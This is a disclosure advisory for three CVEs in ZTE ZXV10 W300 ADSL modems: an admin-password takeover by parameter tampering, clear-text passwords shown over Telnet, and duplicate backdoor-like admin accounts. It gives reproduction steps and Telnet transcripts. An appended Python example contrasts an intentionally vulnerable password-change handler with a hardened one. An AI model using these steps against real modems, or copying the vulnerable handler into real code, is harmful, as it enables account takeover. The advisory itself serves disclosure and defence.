# Exploit Title: [ZTE ADSL ZXV10 W300 modems - Multiple vulnerabilities]
# Discovered by: Karn Ganeshen
# Vendor Homepage: [www.zte.com.cn]
# Versions Reported: [W300V2.1.0f_ER7_PE_O57 and W300V2.1.0h_ER7_PE_O57]

*CVE-ID*: CVE-2015-7257, CVE-2015-7258, CVE-2015-7259

*Note*: Large deployment size, primarily in Peru, used by TdP.

1. *Insufficient authorization controls*
*CVE-ID*: CVE-2015-7257

Observed in the Password Change functionality. Other functions may be vulnerable as well.

*Expected behavior:* Only the administrative 'admin' user should be able to change the password of any device user. 'support' is a diagnostic user with restricted privileges; it can change only its own password.

*Vulnerability:* Any non-admin user can change the 'admin' password.

*Steps to reproduce:*
a. Login as user 'support', password XXX
b. Access the Password Change page - http://<IP>/password.htm
c. Submit the request
d. Intercept and tamper with the username parameter: change it from 'support' to 'admin'
e. Enter the new password > the old password is not requested > Submit > Login as admin -> Pwn!

2. *Sensitive information disclosure - clear-text passwords*
*CVE-ID*: CVE-2015-7258

Displaying user information over a Telnet connection shows all valid users and their passwords in clear text.

*Steps to reproduce:*

$ telnet <IP>
Trying <IP>...
Connected to <IP>.
Escape character is '^]'.

User Access Verification
Username: admin
Password: <-- admin/XXX1
$sh
ADSL#login show <-- shows user information

Username   Password    Priority
admin      password1   2
support    password2   0
admin      password3   1

3. *(Potential) Backdoor account feature - insecure account management*
*CVE-ID*: CVE-2015-7259

The same login account can exist on the device multiple times, each with a different priority number. It is possible to log in to the device with either username/password combination. This is considered a (redundant) login support *feature*.

*Steps to reproduce:*

$ telnet <IP>
Trying <IP>...
Connected to <IP>.
Escape character is '^]'.

User Access Verification
Username: admin
Password: <-- admin/password3
$sh
ADSL#login show

Username   Password    Priority
admin      password1   2
support    password2   0
admin      password3   1

+++++
--
Best Regards,
Karn Ganeshen
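As an added illustration of issue 1 (this is not ZTE firmware code; the handler functions, the Device credential store and the sample passwords are hypothetical), the authorization decision behind a password-change request, once in the vulnerable shape that trusts the submitted username and never asks for the old password, and once in a hardened shape that binds the target account to the authenticated session, restricts non-admin users to their own account and re-authenticates self-service changes:

```python
from dataclasses import dataclass, field

ADMIN, SUPPORT = "admin", "support"


@dataclass
class Device:
    # Constructed sample credential store (hypothetical); priorities mirror
    # the columns of the 'login show' output in the advisory.
    users: dict = field(default_factory=lambda: {
        ADMIN: {"password": "password1", "priority": 2},
        SUPPORT: {"password": "password2", "priority": 0},
    })


def change_password_vulnerable(dev, session_user, form):
    """Vulnerable pattern: the target account is whatever the request body
    says, the logged-in identity is ignored and no old password is checked."""
    target = form["username"]  # attacker-controlled; session_user never consulted
    if target not in dev.users:
        return False
    dev.users[target]["password"] = form["new_password"]
    return True


def change_password_hardened(dev, session_user, form):
    """Hardened pattern: identity comes from the authenticated session.
    Returns (ok, reason); the store is only mutated when ok is True."""
    # Default the target to the caller; a supplied username is still checked.
    target = form.get("username", session_user)
    if session_user != ADMIN and target != session_user:
        return False, "only admin may change other users' passwords"
    if target not in dev.users:
        return False, "unknown user"
    # Self-service changes must prove knowledge of the current password
    # (an admin resetting another account has no old password to present).
    if target == session_user and form.get("old_password") != dev.users[target]["password"]:
        return False, "old password required and must match"
    dev.users[target]["password"] = form["new_password"]
    return True, "changed"
```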